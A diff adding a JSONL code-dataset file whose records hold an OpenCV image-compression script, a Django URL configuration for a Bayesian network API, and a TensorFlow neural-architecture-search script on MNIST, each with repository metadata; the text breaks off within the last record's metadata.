diff --git "a/1466.jsonl" "b/1466.jsonl" new file mode 100644--- /dev/null +++ "b/1466.jsonl" @@ -0,0 +1,642 @@ +{"seq_id": "25033867342", "text": "import cv2\nimport os\n\n# function to compress image using above method\ndef compress_image(image_path, quality=10, save_path=None):\n \"\"\"Compress an image to 10% of original size\"\"\"\n image = cv2.imread(image_path)\n # file_name = file_name.split('.')[0] + f'_q{quality}.' + file_name.split('.')[1]\n cv2.imwrite(save_path, image, [int(cv2.IMWRITE_JPEG_QUALITY), quality])\n\nif __name__=='__main__':\n image_path = 'test.png'\n output_path = 'compressed_images/'\n compress_image(image_path, output_path, quality=10)", "repo_name": "ANMOL2212002/Generative-Neural-Network-Based-Image-Compression", "sub_path": "png_to_compressed.py", "file_name": "png_to_compressed.py", "file_ext": "py", "file_size_in_byte": 527, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "cv2.imread", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 9, "usage_type": "attribute"}]} +{"seq_id": "24968868695", "text": "\"\"\"horseid URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.views.generic.base import TemplateView\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom api import views\n\n\n\n\n\n\n\nurlpatterns = [\n\n\n\t#API URLs \t\t\t\t\t\t\t\t\t\t\t\t\tREPONSE FUNCTIONS\n url(r'^admin/', \t\t\t\t\t\t\t\t\t\t\tadmin.site.urls),\n url(r'^variables/', \t\t\t\t\t\t\t\t\t\tviews.VariablesList.as_view()),\n url(r'^is_started/', \t\t\t\t\t\t\t\t\t\tviews.IsStarted.as_view()),\n url(r'^network_data/', \t\t\t\t\t\t\t\t\t\tviews.NetworkData.as_view()),\n url(r'^view_network/', \t\t\t\t\t\t\t\t\t\tviews.ViewNetwork.as_view(), name=\"view_network\"),\n url(r'^update/', \t\t\t\t\t\t\t \t\t\tviews.UpdateAndQuery.as_view()),\n url(r'^model/start/', views.HorseIDBayesianNetworkAPI.start.as_view()),\n url(r'^model/build/',\t\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.build.as_view()),\n url(r'^model/run/',\t\t\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.run.as_view()),\n url(r'^model/update/',\t\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.update.as_view()),\n url(r'^model/initialise_space/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.initialise_space.as_view()),\n url(r'^model/set_universe/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.set_universe.as_view()),\n url(r'^model/clear_values/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.clear_values.as_view()),\n url(r'^model/use_default_values/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.use_default_values.as_view()),\n url(r'^model/declare_variables/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.declare_variables.as_view()),\n url(r'^model/update_values/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.update_values.as_view()),\n url(r'^model/load_sizes/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_sizes.as_view()),\n url(r'^model/set_evidences/',\t\t\t\t\t\t\t views.HorseIDBayesianNetworkAPI.set_evidences.as_view()),\n url(r'^model/load_evidences/', views.HorseIDBayesianNetworkAPI.load_evidences.as_view()),\n url(r'^model/set_cpds/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.set_cpds.as_view()),#stop here\n url(r'^model/load_cpds/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_cpds.as_view()),\n url(r'^model/load_default_graph/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_default_graph.as_view()),\n url(r'^model/draw_default_graph/', views.HorseIDBayesianNetworkAPI.draw_default_graph.as_view()),\n url(r'^model/load_graph/', views.HorseIDBayesianNetworkAPI.load_graph.as_view()),\n url(r'^model/draw_graph/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.draw_graph.as_view()),\n url(r'^model/build_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.build_model.as_view()),\n url(r'^model/load_cpds_to_model/',\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_cpds_to_model.as_view()),\n url(r'^model/load_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.load_model.as_view()),\n url(r'^model/train_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.train_model.as_view()),\n url(r'^model/update_model/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.update_model.as_view()),\n url(r'^model/test_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.test_model.as_view()),\n url(r'^model/describe_node/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.describe_node.as_view()),\n url(r'^model/check_model/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.check_model.as_view()),\n url(r'^model/get_edges/', views.HorseIDBayesianNetworkAPI.get_edges.as_view()),\n url(r'^model/get_nodes/', views.HorseIDBayesianNetworkAPI.get_nodes.as_view()),\n url(r'^model/get_cpds/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.get_cpds.as_view()),\n \turl(r'^model/get_cardinality/',\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.get_cardinality.as_view()),\n \turl(r'^model/get_local_independencies/',\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.get_local_independencies.as_view()),\n \turl(r'^model/get_active_trail_nodes/',\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.get_active_trail_nodes.as_view()),\n \turl(r'^model/query/',\t\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.query.as_view()),\n \turl(r'^model/map_query/',\t\t\t\t\t\t\t\t\tviews.HorseIDBayesianNetworkAPI.map_query.as_view()),\n url(r'^model/test_all/', views.HorseIDBayesianNetworkAPI.test_all.as_view()),\n url(r'^$', TemplateView.as_view(template_name=\"index.html\"),name='home'),\n];\n\nurlpatterns = format_suffix_patterns(urlpatterns);\n", "repo_name": "professorbashorun/Bayesian-Learning", "sub_path": "horseid/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 5157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 32, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "api.views.VariablesList.as_view", "line_number": 33, "usage_type": "call"}, {"api_name": "api.views.VariablesList", "line_number": 33, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 33, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 34, "usage_type": "call"}, {"api_name": "api.views.IsStarted.as_view", "line_number": 34, "usage_type": "call"}, {"api_name": "api.views.IsStarted", "line_number": 34, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 34, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 35, "usage_type": "call"}, {"api_name": "api.views.NetworkData.as_view", "line_number": 35, "usage_type": "call"}, {"api_name": "api.views.NetworkData", "line_number": 35, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 36, "usage_type": "call"}, {"api_name": "api.views.ViewNetwork.as_view", "line_number": 36, "usage_type": "call"}, {"api_name": "api.views.ViewNetwork", "line_number": 36, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 36, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 37, "usage_type": "call"}, {"api_name": "api.views.UpdateAndQuery.as_view", "line_number": 37, "usage_type": "call"}, {"api_name": "api.views.UpdateAndQuery", "line_number": 37, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 37, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 38, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.start.as_view", "line_number": 38, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 38, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 38, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.build.as_view", "line_number": 39, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 39, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 39, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 40, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.run.as_view", "line_number": 40, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 40, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 41, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.update.as_view", "line_number": 41, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 41, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 41, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 42, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.initialise_space.as_view", "line_number": 42, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 42, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 42, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 43, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.set_universe.as_view", "line_number": 43, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 43, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 43, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 44, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.clear_values.as_view", "line_number": 44, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 44, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 44, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 45, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.use_default_values.as_view", "line_number": 45, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 45, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 45, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 46, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.declare_variables.as_view", "line_number": 46, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 46, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 46, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 47, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.update_values.as_view", "line_number": 47, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 47, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 47, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 48, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_sizes.as_view", "line_number": 48, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 48, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 48, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 49, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.set_evidences.as_view", "line_number": 49, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 49, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 49, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 50, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_evidences.as_view", "line_number": 50, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 50, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 50, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 51, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.set_cpds.as_view", "line_number": 51, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 51, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 51, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 52, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_cpds.as_view", "line_number": 52, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 52, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 52, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 53, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_default_graph.as_view", "line_number": 53, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 53, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 53, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 54, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.draw_default_graph.as_view", "line_number": 54, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 54, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 54, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 55, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_graph.as_view", "line_number": 55, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 55, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 55, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 56, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.draw_graph.as_view", "line_number": 56, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 56, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 56, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 57, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.build_model.as_view", "line_number": 57, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 57, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 57, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 58, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_cpds_to_model.as_view", "line_number": 58, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 58, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 58, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 59, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.load_model.as_view", "line_number": 59, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 59, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 59, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 60, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.train_model.as_view", "line_number": 60, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 60, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 60, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 61, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.update_model.as_view", "line_number": 61, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 61, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 61, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 62, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.test_model.as_view", "line_number": 62, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 62, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 62, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 63, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.describe_node.as_view", "line_number": 63, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 63, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 63, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 64, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.check_model.as_view", "line_number": 64, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 64, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 64, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 65, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_edges.as_view", "line_number": 65, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 65, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 65, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 66, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_nodes.as_view", "line_number": 66, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 66, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 66, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 67, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_cpds.as_view", "line_number": 67, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 67, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 67, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 68, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_cardinality.as_view", "line_number": 68, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 68, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 68, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 69, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_local_independencies.as_view", "line_number": 69, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 69, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 69, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 70, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.get_active_trail_nodes.as_view", "line_number": 70, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 70, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 70, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 71, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.query.as_view", "line_number": 71, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 71, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 71, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 72, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.map_query.as_view", "line_number": 72, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 72, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 72, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 73, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI.test_all.as_view", "line_number": 73, "usage_type": "call"}, {"api_name": "api.views.HorseIDBayesianNetworkAPI", "line_number": 73, "usage_type": "attribute"}, {"api_name": "api.views", "line_number": 73, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 74, "usage_type": "call"}, {"api_name": "django.views.generic.base.TemplateView.as_view", "line_number": 74, "usage_type": "call"}, {"api_name": "django.views.generic.base.TemplateView", "line_number": 74, "usage_type": "name"}, {"api_name": "rest_framework.urlpatterns.format_suffix_patterns", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "16942511438", "text": "import os\nimport numpy as np\nimport tensorflow as tf\nfrom keras.layers import LSTM\nfrom keras import regularizers\nfrom keras import backend as K\nfrom keras.layers import Embedding\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\ninputdim, timesteps, classes = 11, 10, 11\nmnist = input_data.read_data_sets(\"MNIST_data/\" , one_hot = True)\n\ndef scale_features(hyp):\n for i in range(timesteps):\n hyp[0, i, :] = (hyp[0, i, :] - np.mean(hyp[0, i, :])) / (hyp[0, i, :].max() - hyp[0, i, :].min())\n return hyp \n\ndef father_network():\n father_lr = 7.0\n inp = tf.placeholder(tf.float32, shape=[1, timesteps, inputdim])\n X = LSTM(35, return_sequences=True)(inp)\n X = LSTM(classes, return_sequences=True)(X)\n hyperparams = Dense(classes, activation='softmax', kernel_regularizer=regularizers.l2(0.01))(X) # [1, timesteps, classes]\n outza = tf.cast(tf.convert_to_tensor([tf.argmax(hyperparams[0, i, :]) for i in range(timesteps)]), tf.float32)\n loss = - tf.reduce_mean(tf.log(1e-10 + hyperparams)) - tf.square(tf.reduce_mean(outza - tf.reduce_mean(outza)))\n val_accuracy = tf.placeholder_with_default(10.0, shape=())\n \n optimizer = tf.train.RMSPropOptimizer(father_lr)\n gradients = optimizer.compute_gradients(loss=loss)\n for i, (grad, var) in enumerate(gradients):\n if grad is not None:\n gradients[i] = (grad * val_accuracy, var)\n train = optimizer.apply_gradients(gradients)\n \n hidden_layers = [25, 50, 100, 200, 300, 400, 500, 600, 700, 800, 900]\n learning_rates = [0.0001, 0.0006, 0.001, 0.005, 0.01, 0.05, 0.1, 0.5, 1.0, 3.0, 6.0]\n \n hyp = np.random.random((1, timesteps, inputdim)).astype(np.float32)\n with tf.Session() as sess:\n K.set_session(sess)\n sess.run(tf.global_variables_initializer())\n print(\"\\n\\n\")\n for i in range(10000):\n print(\"Controller Epoch # {}\".format(i))\n out = [np.argmax(hyp[0, i, :]) for i in range(timesteps)]\n print(\"{}\\n\\n\".format(out))\n no_hidden, lr = hidden_layers[out[0]], learning_rates[out[1]]\n val_acc = train_network(no_hidden, lr)\n output = \"\\nController Loss : {}\\n\".format(sess.run(loss, feed_dict={inp: hyp}))\n output += \"Accuracy : {}, Learning Rate : {}, Hidden Number : {}\\n\".format(val_acc, lr, no_hidden)\n with open(\"accuracy.log\", \"a+\") as f:\n f.write(output)\n print(output)\n hyp = np.roll(hyp, 1, axis=1)\n hyp = scale_features(hyp)\n _ = sess.run(train, feed_dict = {val_accuracy : val_acc ** 3, inp:hyp})\n hyp = sess.run(hyperparams, feed_dict={inp : hyp})\n # Remove last one and pad the start by 1\n\ndef train_network(no_hidden=600, learning_rate=3.0):\n no_input, no_output = 784, 10\n val_accuracy = 0\n\n x = tf.placeholder(tf.float32 ,shape = [None, no_input])\n y = tf.placeholder(tf.float32 , shape = [None, no_output])\n\n W1 = tf.Variable(tf.random_normal(shape = [no_input, no_hidden])) # Used Theta1'\n W2 = tf.Variable(tf.random_normal(shape = [no_hidden ,no_output]))\n b1 = tf.Variable(tf.random_normal(shape = [1, no_hidden]))\n b2 = tf.Variable(tf.random_normal(shape = [1, no_output]))\n \n h = tf.matmul(tf.nn.sigmoid(tf.matmul(x, W1) + b1), W2) + b2\n\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = h,labels = y))\n gradient = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n\n equal = tf.equal(tf.argmax(y, 1) , tf.argmax(h, 1))\n accuracy = tf.reduce_mean(tf.cast(equal , tf.float32))\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(700): \n batch_X , batch_Y = mnist.train.next_batch(100)\n loss, _ = sess.run([cost, gradient], feed_dict = {x : batch_X , y : batch_Y})\n print(\"Child Loss : {}\".format(loss), end=\"\\r\")\n val_accuracy = sess.run(accuracy, feed_dict = {x : mnist.validation.images, y : mnist.validation.labels})\n return val_accuracy\n\nif __name__ == '__main__':\n father_network()", "repo_name": "dhruvramani/Neural-Architecture-Search-with-RL", "sub_path": "model_dummy/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 4242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 42, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "keras.layers.LSTM", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.regularizers", "line_number": 28, "usage_type": "name"}, {"api_name": "tensorflow.cast", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.placeholder_with_default", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.train.RMSPropOptimizer", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 33, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 43, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.backend.set_session", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 45, "usage_type": "name"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 70, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax_cross_entropy_with_logits", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 82, "usage_type": "call"}, {"api_name": 